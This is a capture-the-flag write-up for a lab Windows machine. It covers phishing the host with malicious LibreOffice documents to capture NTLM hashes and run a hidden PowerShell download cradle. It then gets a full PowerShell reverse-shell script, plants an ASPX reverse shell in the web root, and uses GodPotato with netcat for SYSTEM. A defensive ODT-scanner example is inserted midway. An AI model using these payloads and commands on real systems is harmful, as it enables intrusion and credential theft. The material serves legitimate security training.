vulnlab-job
nmap scan
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-28T14:15:10+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2024-06-27T12:41:55
|_Not valid after:  2024-12-27T12:41:55
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-06-28T14:15:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
cat /etc/hosts | grep job
10.10.114.36 job.local
The website shows one email address: career@job.local
It also states that if you are sending your resume, it should be a LibreOffice document.
Phishing, try 1: getting some Windows hashes
First, generate an msf payload:
use auxiliary/fileformat/odt_badodt
set LHOST tun0
run
Then send a mail and catch the hashes received:
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt
Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.99.156,51049)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.99.156,51049)
[*] Remaining connections []
[*] Incoming connection (10.10.99.156,51050)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*]
The hash could not be cracked with john and rockyou.txt.
Phishing seems to be the way to go, so what I did is the following.
The following write-up provides a very good example of how to do this:
https://0xdf.gitlab.io/2020/02/01/htb-re.html
msf6 > set payload windows/x64/exec
payload => windows/x64/exec
msf6 > set LHOST 10.8.2.138
LHOST => 10.8.2.138
msf6 > set LPORT 80
LPORT => 80
msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');"
cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');
shell.txt
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cat shell.txt
function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read;
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}
    }
    if ($pos -gt 0) {
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read());
                if ($out -eq $string) {$out = ''}
            }
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null
        }
    } else {cleanup}
}
msf6 exploit(multi/misc/openoffice_document_macro) > show options

Module options (exploit/multi/misc/openoffice_document_macro):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BODY                       no        The message for the document body
   FILENAME  msf.odt          yes       The OpenOffice Text document name
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)

Payload options (windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');  yes  The command string to execute
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)

Exploit target:

   Id  Name
   --  ----
   0   Apache OpenOffice on Windows (PSH)

View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80
srvport => 80
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) >
[*] Using URL: http://10.8.2.138/7Jnb1x3
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/puck/.msf4/local/msf.odt
exit
[*] Server stopped.
[*] Server stopped.

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp /home/puck/.msf4/local/msf.odt .

Now the malicious ODT is downloaded:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 -

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rm 7Jnb1x3
└─$ cp shell.txt 7Jnb1x3

Run again!
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138>
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

Now the shell is downloaded:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 -
10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -
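A defender-side check that covers both documents used in this phishing chain: the odt_badodt file, which makes the office suite open an SMB connection and hand over the user's NetNTLMv2 response, and the openoffice_document_macro file, which carries a Basic macro library. The scanner below is an added example written for this page; it is not the writeup's tooling and not part of Metasploit. It treats the .odt as the zip it is, flags the Basic/ macro files using the layout the msf packaging output above lists, flags xlink:href targets that point at UNC/SMB paths, and flags remote URLs only in elements that are resolved on open (draw:image and friends), leaving ordinary clickable text:a hyperlinks alone. The three documents it builds in memory are constructed for the demo; the element names and the Basic/ layout are the assumptions.

```python
"""Static triage of an OpenDocument Text (.odt) attachment.

Added example for this writeup (not the author's tooling, not Metasploit code).
It looks for the two things the phishing documents above rely on:
  1. an embedded Basic macro library (Basic/script-lc.xml, Basic/<lib>/script-lb.xml,
     Basic/<lib>/<Module>.xml), the layout the msf packaging output lists;
  2. xlink:href targets that the suite resolves when the file is opened, e.g. a UNC
     path (\\host\share\...) that triggers an outbound SMB authentication.
Plain text hyperlinks (text:a) to http(s) are not flagged: they resolve on click
only. Which elements auto-fetch is an assumption made for this example.
"""
import io
import re
import sys
import zipfile

# Macro library files inside the ODF zip (assumed layout, taken from the msf output above).
MACRO_FILE = re.compile(r"^Basic/(script-lc\.xml|[^/]+/[^/]+\.xml)$")
# Any element carrying an xlink:href attribute: captures (element name, target).
TAG_HREF = re.compile(r'<([A-Za-z]+:[A-Za-z-]+)\b[^>]*?xlink:href="([^"]*)"')
# Targets that make the suite contact a file server as soon as the document opens.
UNC_OR_FILE = re.compile(r"^(\\\\|//|smb://|file://)", re.IGNORECASE)
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Elements whose href is fetched automatically rather than on click (assumption).
AUTO_FETCH = {"draw:image", "draw:object", "draw:object-ole", "draw:plugin", "text:section"}


def scan_odt(data: bytes) -> dict:
    """Return findings for one .odt given as raw bytes."""
    findings = {"macros": [], "manifest_lists_basic": False, "remote_links": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        findings["macros"] = [n for n in names if MACRO_FILE.match(n)]
        if "META-INF/manifest.xml" in names:
            manifest = z.read("META-INF/manifest.xml").decode("utf-8", "replace")
            findings["manifest_lists_basic"] = 'manifest:full-path="Basic/' in manifest
        for part in ("content.xml", "styles.xml", "settings.xml"):
            if part not in names:
                continue
            xml = z.read(part).decode("utf-8", "replace")
            for tag, href in TAG_HREF.findall(xml):
                if UNC_OR_FILE.match(href) or (tag in AUTO_FETCH and REMOTE_URL.match(href)):
                    findings["remote_links"].append((part, tag, href))
    findings["suspicious"] = bool(
        findings["macros"] or findings["manifest_lists_basic"] or findings["remote_links"]
    )
    return findings


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan_odt(fh.read())


def make_sample_odt(parts: dict) -> bytes:
    """Build a minimal ODF zip in memory (constructed sample, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        # ODF requires 'mimetype' as the first entry, stored uncompressed.
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                   compress_type=zipfile.ZIP_STORED)
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


_CONTENT = ('<office:document-content><office:body><office:text>'
            '<text:p>CV <text:a xlink:href="https://example.com/">portfolio</text:a></text:p>'
            '</office:text></office:body></office:document-content>')
_MANIFEST = ('<manifest:manifest><manifest:file-entry manifest:full-path="/" '
             'manifest:media-type="application/vnd.oasis.opendocument.text"/>'
             '<manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>'
             '</manifest:manifest>')

# Constructed samples: a clean CV, one carrying a macro library, one with a UNC image link.
CLEAN_ODT = make_sample_odt({"META-INF/manifest.xml": _MANIFEST, "content.xml": _CONTENT})
MACRO_ODT = make_sample_odt({
    "META-INF/manifest.xml": _MANIFEST.replace(
        "</manifest:manifest>",
        '<manifest:file-entry manifest:full-path="Basic/" manifest:media-type="application/binary"/>'
        "</manifest:manifest>"),
    "content.xml": _CONTENT,
    "Basic/script-lc.xml": "<library:libraries/>",
    "Basic/Standard/script-lb.xml": "<library:library/>",
    "Basic/Standard/Module1.xml": "<script:module/>",
})
LINK_ODT = make_sample_odt({
    "META-INF/manifest.xml": _MANIFEST,
    "content.xml": _CONTENT.replace(
        "</text:p>",
        '</text:p><draw:frame><draw:image xlink:href="\\\\10.8.2.138\\share\\logo.png"/></draw:frame>'),
})

if __name__ == "__main__":
    # With file arguments: scan real attachments. Without: run the built-in samples.
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            print(path, scan_file(path))
    else:
        for label, doc in (("clean", CLEAN_ODT), ("macro", MACRO_ODT), ("unc-link", LINK_ODT)):
            print(label, scan_odt(doc))
```

The two signals are deliberately separate: a macro library is a strong indicator on its own (a CV has no reason to carry Basic code), while a link is only interesting when the target is a file share or when the element auto-resolves it. On a mail gateway this is the kind of check that would have stopped both attachments before the "resume must be a LibreOffice document" request could be exploited.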
And we catch the shell as user:
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
job\jack.black

c:\Users\jack.black\Desktop>type user.txt
VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir

    Directory: C:\inetpub\wwwroot

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/10/2021   8:52 PM                aspnet_client
d-----         11/9/2021   9:24 PM                assets
d-----         11/9/2021   9:24 PM                css
d-----         11/9/2021   9:24 PM                js
-a----        11/10/2021   9:01 PM            298 hello.aspx
-a----         11/7/2021   1:05 PM           3261 index.html

PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx
PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx
Privesc
After checking the files and folders on this machine, I noticed that inetpub/wwwroot allows us to upload files to the website.
I created an ASPX reverse shell with
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx
and then did a curl http://job.local/reverse.aspx to get a new shell:
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140720521084928
[*] DispatchTable: 0x140720523675512
[*] UseProtseqFunction: 0x140720522968944
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835
[*] DCOM obj OXID: 0x7374a001401060e1
[*] DCOM obj OID: 0x734f5c52566383ce
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x732 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3552
And we have an admin shell.
SeImpersonatePrivilege is enabled, so we used GodPotato:
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{0102<REDACTED>5152}
We now have an admin reverse shell.